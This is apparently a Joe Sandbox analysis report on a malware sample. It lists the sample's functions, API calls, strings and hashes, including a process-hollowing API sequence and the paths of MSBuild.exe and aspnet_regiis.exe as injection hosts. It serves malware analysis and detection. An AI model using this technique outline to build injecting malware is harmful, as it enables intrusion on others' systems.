Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1224
Imagebase:	0x730000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.1%
Total number of Nodes:	1502
Total number of Limit Nodes:	10

Executed Functions

Function 6E0B8F60 Relevance: 98.9, APIs: 31, Strings: 21, Instructions: 7885nativethreadmemoryCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE(?,?,?,?,?,?,?,?), ref: 6E0BAF63
ShowWindow.USER32 ref: 6E0BAF79
VirtualAlloc.KERNELBASE ref: 6E0BB8D2
CreateProcessW.KERNELBASE ref: 6E0BBD66
NtGetContextThread.NTDLL ref: 6E0BC25A
NtAllocateVirtualMemory.NTDLL ref: 6E0BC4C2
NtAllocateVirtualMemory.NTDLL ref: 6E0BC686
NtWriteVirtualMemory.NTDLL ref: 6E0BCA5B
NtWriteVirtualMemory.NTDLL ref: 6E0BD0F5
NtReadVirtualMemory.NTDLL ref: 6E0BE215
NtWriteVirtualMemory.NTDLL ref: 6E0BE2A6
NtWriteVirtualMemory.NTDLL ref: 6E0BE862
NtCreateThreadEx.NTDLL ref: 6E0BED11
NtSetContextThread.NTDLL ref: 6E0BEF75
NtResumeThread.NTDLL ref: 6E0BEF93
CloseHandle.KERNEL32 ref: 6E0BF20E
CloseHandle.KERNEL32 ref: 6E0BF222
GetConsoleWindow.KERNEL32 ref: 6E0BF377
ShowWindow.USER32 ref: 6E0BF38D
VirtualAlloc.KERNEL32 ref: 6E0BF64F
NtGetContextThread.NTDLL ref: 6E0BF88F
NtAllocateVirtualMemory.NTDLL ref: 6E0BFA12
NtWriteVirtualMemory.NTDLL ref: 6E0BFBE4
NtWriteVirtualMemory.NTDLL ref: 6E0C0154
CreateProcessW.KERNEL32 ref: 6E0C0366
NtGetContextThread.NTDLL ref: 6E0C03B2
NtCreateThreadEx.NTDLL ref: 6E0C0672
NtGetContextThread.NTDLL ref: 6E0C076E

Strings

Cs>, xrefs: 6E0BDC23
j9kM, xrefs: 6E0BB98E
R#*~, xrefs: 6E0BB758
'-, xrefs: 6E0C009C
D, xrefs: 6E0C02CE
&9, xrefs: 6E0C01B9
K[R, xrefs: 6E0BB2DD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6E0BBBD4
C~X, xrefs: 6E0BAF05
j9kM, xrefs: 6E0BB9FC
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6E0BBBA3
}K|M, xrefs: 6E0BFA91
@, xrefs: 6E0BFA0A
ntdll.dll, xrefs: 6E0BAF93, 6E0BF3A7
t+, xrefs: 6E0C003C
'-, xrefs: 6E0C00E5
&9, xrefs: 6E0C020A
C~X, xrefs: 6E0B8FBF
MZx, xrefs: 6E0BAFA7, 6E0BAFC9, 6E0BF3BB, 6E0BF3DD
t+, xrefs: 6E0BFFC6
kernel32.dll, xrefs: 6E0BAF7F, 6E0BF393

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: Virtual$Memory$Thread$Write$Context$CreateWindow$Allocate$AllocCloseConsoleHandleProcessShow$ReadResume
String ID: &9$&9$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$C~X$C~X$Cs>$D$K[R$MZx$R#*~$j9kM$j9kM$kernel32.dll$ntdll.dll$}K|M$'-$'-$t+$t+
API String ID: 2346638825-2682533363
Opcode ID: 90b97c6c6236fe6abe2cbc84953c687703f31866deb9ae6fd8665c88bf1b5798
Instruction ID: 06a45bc1d78f8957b7305ca1d1a563a711c1da64ded5734a4d8dc014521e578b
Opcode Fuzzy Hash: 90b97c6c6236fe6abe2cbc84953c687703f31866deb9ae6fd8665c88bf1b5798
Instruction Fuzzy Hash: 8FD32376A446118FDF088EBCCDE83CD7BE2BB86351F108294D819DB394D6368A89DF45

Function 6E0B1970 Relevance: 65.0, APIs: 22, Strings: 13, Instructions: 3701filememoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6E0B2AB9
GetModuleHandleA.KERNEL32 ref: 6E0B2C7F
K32GetModuleInformation.KERNEL32 ref: 6E0B2EE4
CreateFileMappingA.KERNEL32 ref: 6E0B33B8
CloseHandle.KERNEL32 ref: 6E0B350C
MapViewOfFile.KERNELBASE ref: 6E0B38A5
VirtualProtect.KERNELBASE ref: 6E0B41CC
VirtualProtect.KERNELBASE ref: 6E0B42F2
CloseHandle.KERNELBASE ref: 6E0B4557
CloseHandle.KERNEL32 ref: 6E0B463F
CloseHandle.KERNEL32 ref: 6E0B4651
GetCurrentProcess.KERNEL32 ref: 6E0B4A58
GetModuleHandleA.KERNEL32 ref: 6E0B4AA2
CloseHandle.KERNEL32 ref: 6E0B4BC3
CloseHandle.KERNEL32 ref: 6E0B4EC0
CloseHandle.KERNEL32 ref: 6E0B4ED2
CreateFileMappingA.KERNEL32 ref: 6E0B4F83

Strings

L^5[, xrefs: 6E0B336A
^J:, xrefs: 6E0B29E6
$wt, xrefs: 6E0B4C2B
L^5[, xrefs: 6E0B341C
vZ*8, xrefs: 6E0B2FB8
`a-, xrefs: 6E0B2DB3
Ty|X, xrefs: 6E0B4EA8
iRnF, xrefs: 6E0B2824
@, xrefs: 6E0B41C0
Ty|X, xrefs: 6E0B4054
`a-, xrefs: 6E0B2D62
$wt, xrefs: 6E0B4CA1
o{IA, xrefs: 6E0B3C09

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: Handle$Close$FileModule$CreateCurrentMappingProcessProtectVirtual$InformationView
String ID: $wt$$wt$@$L^5[$L^5[$Ty|X$Ty|X$^J:$`a-$`a-$iRnF$o{IA$vZ*8
API String ID: 1348546524-1338951784
Opcode ID: 0a6dd9fae87cd891d9f9d8f9cb40febd3872d2a15ba5b916896fb388a79f0567
Instruction ID: 967fd7ff83d19c510216fc67e705733bcbf1a3718ad8947a1fe515e590e2922e
Opcode Fuzzy Hash: 0a6dd9fae87cd891d9f9d8f9cb40febd3872d2a15ba5b916896fb388a79f0567
Instruction Fuzzy Hash: 1D534736A456118FEB088F7CCDA5BCD37F3BB46350F108695D969DB394D23A8A898F04

Function 6E0B7510 Relevance: 17.2, APIs: 4, Strings: 5, Instructions: 1437nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 6E0B7ECF
GetModuleHandleW.KERNEL32 ref: 6E0B86BE
GetModuleHandleW.KERNEL32 ref: 6E0B8904

Strings

%x, xrefs: 6E0B87D3
%x, xrefs: 6E0B8821
ntdll.dll, xrefs: 6E0B7B0C, 6E0B86B5, 6E0B88FB
NtQueryInformationProcess, xrefs: 6E0B7B7E
&aT, xrefs: 6E0B7DC6

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: HandleModule$InformationProcessQuery
String ID: %x$%x$&aT$NtQueryInformationProcess$ntdll.dll
API String ID: 188072037-1314361212
Opcode ID: 3e9d598a9ba1598ca62ebbb86c5d5030df6d5774703318f7e5c0a4396e52dcfd
Instruction ID: cbe0f27c719a41db705948f4a66076970ce81cd7bc49ef72b2905d3d3cbcbb14
Opcode Fuzzy Hash: 3e9d598a9ba1598ca62ebbb86c5d5030df6d5774703318f7e5c0a4396e52dcfd
Instruction Fuzzy Hash: 5DA23736A405468FEF088EFCC9E53CE7BE2BB42364F149619C415EF7A8D23B85498B15

Function 6E0C1148 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6E0C118F
___scrt_uninitialize_crt.LIBCMT ref: 6E0C11A9

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: c033ddcc48f9dcce9ab6f2e568e4924810796c6da343baa096e5a6e5249d2c01
Instruction ID: 1a9314fadc8956e9a94f245f0e7795b265e801ecb61de4394cf450bdb778f37e
Opcode Fuzzy Hash: c033ddcc48f9dcce9ab6f2e568e4924810796c6da343baa096e5a6e5249d2c01
Instruction Fuzzy Hash: 7041F472D04619AFDB219FD5CC00BEE3AB9EF45FA5F104519E828A7250D7308D1ADBD2

Function 6E0C11F8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6E0C1235
dllmain_crt_dispatch.LIBCMT ref: 6E0C124C
dllmain_raw.LIBCMT ref: 6E0C1294
dllmain_crt_dispatch.LIBCMT ref: 6E0C12A7
dllmain_raw.LIBCMT ref: 6E0C12BA

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 8ce6fbd56ea1046c9fc650d0ead2cbd9ab17e9e3ff97f1001d0d1edafca340a1
Instruction ID: afb52db669239dca1b828cf4a24f1b39e10517d647f0c301f6785c69818aaa2e
Opcode Fuzzy Hash: 8ce6fbd56ea1046c9fc650d0ead2cbd9ab17e9e3ff97f1001d0d1edafca340a1
Instruction Fuzzy Hash: 97217E76D04219AFDB618ED5C840FAF3AB9EF95F95F004515F8149B210D3308D568BD2

Function 6E0C1041 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6E0C108E

Part of subcall function 6E0C150B: InitializeSListHead.KERNEL32(6E11F988,6E0C1098,6E0D10D8,00000010,6E0C1029,?,?,?,6E0C1251,?,00000001,?,?,00000001,?,6E0D1120), ref: 6E0C1510

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E0C10F8

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 2977293001509cd5719b671b0f0f98b9c3f9f8b97fd214e39713ccf8afc4a681
Instruction ID: 8fb1cbe527d1613287d60f14921e1d75c75b1d30a781ff990031205b6871dade
Opcode Fuzzy Hash: 2977293001509cd5719b671b0f0f98b9c3f9f8b97fd214e39713ccf8afc4a681
Instruction Fuzzy Hash: 39210F32A08205AEDB00ABF4D5157DD37F59F07FACF200859E85A2B6C1CB76440DC6A7

Function 6E0C5E6D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6E0C5EB9
GetFileType.KERNELBASE(00000000), ref: 6E0C5ECB

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: ee6ec76af47af5f07e978199e4cf1eabf58b491d6d3a198182e87ed497a3359b
Instruction ID: c8f74903a8752a794d11d51d8558beb248a67320d5abf07e7866480fc6270ad3
Opcode Fuzzy Hash: ee6ec76af47af5f07e978199e4cf1eabf58b491d6d3a198182e87ed497a3359b
Instruction Fuzzy Hash: 5A11273D618B528BC7784ABE8C9831F7AD59B4B670B34071AD4B5865E5C370C482C206

Function 6E0C66D0 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6E0C66FE
_free.LIBCMT ref: 6E0C6724

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0ce66a9633916ef365d1d539ccf822f33e27730b808750d0ab3b9e0a02b16198
Instruction ID: 37584b5aa8b9f5f7d09a2bbb3eca296c81925517af739eb20adbf48862a4f67b
Opcode Fuzzy Hash: 0ce66a9633916ef365d1d539ccf822f33e27730b808750d0ab3b9e0a02b16198
Instruction Fuzzy Hash: 66110F71A246016FEB308EB8AD14B9D329AF716FB4F154B16E629DF2C0F374C8C25646

Function 6E0C4436 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E0C4039,00000001,00000364,00000013,000000FF,?,00000001,6E0C4428,6E0C44B9,?,?,6E0C36CC), ref: 6E0C4477

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 56c075de7becbc2bb33e02f202251fe9df172c0f0347f5c30787bf260cd52f98
Instruction ID: 410db7b36ab7701dbcd2dffa6004e177b125cd1c9c2473570ec513dde6bcdeae
Opcode Fuzzy Hash: 56c075de7becbc2bb33e02f202251fe9df172c0f0347f5c30787bf260cd52f98
Instruction Fuzzy Hash: 2CF090325045257BAB614AE6E804B9F379FFF82FA0B318111A814EB1C8CB70D50286E3

Non-executed Functions

Function 009E26B0 Relevance: 17.1, Strings: 13, Instructions: 836
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\KJQ, xrefs: 009E2D49
uwyT, xrefs: 009E2A32
_fV, xrefs: 009E2ABA
pDyy, xrefs: 009E2A0F
QSeh, xrefs: 009E29F3
}$(`, xrefs: 009E2A24
_kS_, xrefs: 009E29E5
WnK{, xrefs: 009E29FA
kRo_, xrefs: 009E2A39
rsC@, xrefs: 009E2A08
[ptv, xrefs: 009E2AC4
.kG, xrefs: 009E2A16
7d[Y, xrefs: 009E2A7E

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: _fV$.kG$7d[Y$QSeh$WnK{$[ptv$\KJQ$_kS_$kRo_$pDyy$rsC@$uwyT$}$(`
API String ID: 0-3998697038
Opcode ID: 27ad55660402163be309cecde897e08eff961dcab03b4b84a0161436b4a8c2a8
Instruction ID: 1b3a3cebff37b802abad6eeeb40b52f1230d10728ecb356169557a5902f5142e
Opcode Fuzzy Hash: 27ad55660402163be309cecde897e08eff961dcab03b4b84a0161436b4a8c2a8
Instruction Fuzzy Hash: 3F520570504B818FC736CF36C490B66BBE6BF56314F188A6DD4E68BB92C735A806CB51

Function 009CB660 Relevance: 16.7, Strings: 13, Instructions: 404
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#'+j, xrefs: 009CB7B0
!-',, xrefs: 009CB7A0
57\, xrefs: 009CB780
rm, xrefs: 009CB6BF
Je;/, xrefs: 009CB68F
O:<;, xrefs: 009CB94E
^YgQ, xrefs: 009CB788
=, xrefs: 009CB7E8
!8 ', xrefs: 009CB69F
SU),, xrefs: 009CB798
,89', xrefs: 009CB697
.sR), xrefs: 009CB7A8
)?6~, xrefs: 009CB67F

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: !-',$!8 '$#'+j$)?6~$,89'$.sR)$57\$=$Je;/$O:<;$SU),$^YgQ$rm
API String ID: 0-1014053324
Opcode ID: d25dfcdc9693c89f1e464dc5a4bff530a28f12fe39707d4f02b04b7e0586a900
Instruction ID: 839a37850e71e1494e2775d0d1dbdd79efcb824e6881a9a77d276a6dd53ef353
Opcode Fuzzy Hash: d25dfcdc9693c89f1e464dc5a4bff530a28f12fe39707d4f02b04b7e0586a900
Instruction Fuzzy Hash: D1D10871A083914BD315CF3984A176BFFE0AFD2344F18496CE5D55B382D779890ACB92

Function 009EF2B0 Relevance: 11.5, Strings: 9, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P{mf, xrefs: 009EF45C
vLYY, xrefs: 009EF4AC
dT]^, xrefs: 009EF498
KF@T, xrefs: 009EF484
lOED, xrefs: 009EF47A
nrui, xrefs: 009EF470
g|i~, xrefs: 009EF466
MaV%, xrefs: 009EF2DB
vsHv, xrefs: 009EF4D4

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: KF@T$MaV%$P{mf$dT]^$g|i~$lOED$nrui$vLYY$vsHv
API String ID: 0-1334427942
Opcode ID: 25da8cb287d80a5293915a4b4a70ee19e78cd8353e16a26922fd5cc17555e8e2
Instruction ID: 304b1bfcf6b7b22ee41db159b48ba2d9b0d33bead17d972fbf9956bf45cc4c64
Opcode Fuzzy Hash: 25da8cb287d80a5293915a4b4a70ee19e78cd8353e16a26922fd5cc17555e8e2
Instruction Fuzzy Hash: 428102B0504B818BE335CF36C5A07A3BFE2AFA2304F18896DD1EB4B246D7756805CB55

Function 6E0B51E0 Relevance: 6.1, Strings: 3, Instructions: 2387COMMON

Download Yara Rule

Strings

W-Fi, xrefs: 6E0B7501
pL$F, xrefs: 6E0B682E
W-Fi, xrefs: 6E0B7292

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID:
String ID: W-Fi$W-Fi$pL$F
API String ID: 0-3784783616
Opcode ID: 065daa14b9197cf31cd52b1462293ad7d15b981060723f0e887bd1e53d201dce
Instruction ID: 1b764e95ecc3d39982ff07847943bb8cdf1144a96dec61eae6c519bd807c2c8a
Opcode Fuzzy Hash: 065daa14b9197cf31cd52b1462293ad7d15b981060723f0e887bd1e53d201dce
Instruction Fuzzy Hash: 42033236A406168FDB08CEBCC9E07DE77F3BB46350F108699D95ADB395C63A89499F00

Function 6E0C182A Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E0C1836
IsDebuggerPresent.KERNEL32 ref: 6E0C1902
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E0C1922
UnhandledExceptionFilter.KERNEL32(?), ref: 6E0C192C

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5bf53175df4019c4a68647c85b43b915ea251ed77abbfd89a1b336201012c6d1
Instruction ID: 5e8555aef301f2ee26e1b07c5996c3ba6f4c8ff3cf7c35540aa5051c3489e59b
Opcode Fuzzy Hash: 5bf53175df4019c4a68647c85b43b915ea251ed77abbfd89a1b336201012c6d1
Instruction Fuzzy Hash: A2311475D45218DBDB50DFA4D989BCDBBB8BF08704F1041AAE409AB240EB719A89CF46

Function 009FB4B0 Relevance: 5.7, Strings: 4, Instructions: 697COMMON

Download Yara Rule

Strings

\, xrefs: 009FB568
C, xrefs: 009FB55D
9, xrefs: 009FB7D0
LO, xrefs: 009FB8E1

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: 9$C$LO$\
API String ID: 0-1645696869
Opcode ID: 512af8a75a172f51a90c3f479bf44823de0cf5aa652ac4a438b759bc7c2491a6
Instruction ID: 574a393ab9e7e7ad660d26c2ececb68106b2a9cf753806a0a01165005a55e2b7
Opcode Fuzzy Hash: 512af8a75a172f51a90c3f479bf44823de0cf5aa652ac4a438b759bc7c2491a6
Instruction Fuzzy Hash: 77322272A083059FD714CF24CC45B6BBBE6EF81314F188A2CE6959B391D778D905CB92

Function 009CBB00 Relevance: 5.4, Strings: 4, Instructions: 358COMMON

Download Yara Rule

Strings

/0'4, xrefs: 009CBCA4
zr, xrefs: 009CBDBF
7 =", xrefs: 009CBCAC
?,<+, xrefs: 009CBCD0

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: /0'4$7 ="$?,<+$zr
API String ID: 0-467445832
Opcode ID: 48af2d476ad165bb59db0bcba7f0037ae263570ab39bb39aefebd4ff2901fbaa
Instruction ID: edae25533990bf79045b8ce4d655d1f0642abeed13484d83c1efa7fdf98425d1
Opcode Fuzzy Hash: 48af2d476ad165bb59db0bcba7f0037ae263570ab39bb39aefebd4ff2901fbaa
Instruction Fuzzy Hash: 69C1DDB19083848FD714DF24C865B6BBBE5EBD1304F14892DE1E28B2A2DB798505CB92

Function 6E0C41BA Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E0C42B2
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E0C42BC
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E0C42C9

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 42e152e28913f7ddc6b6e324f740493a94ac9088f22afeb8a042975d77d2c6e8
Instruction ID: fc1e4bbc23b51f51b8bcd9f3004cabe5429d6c2bd98d10398d08057badfe6475
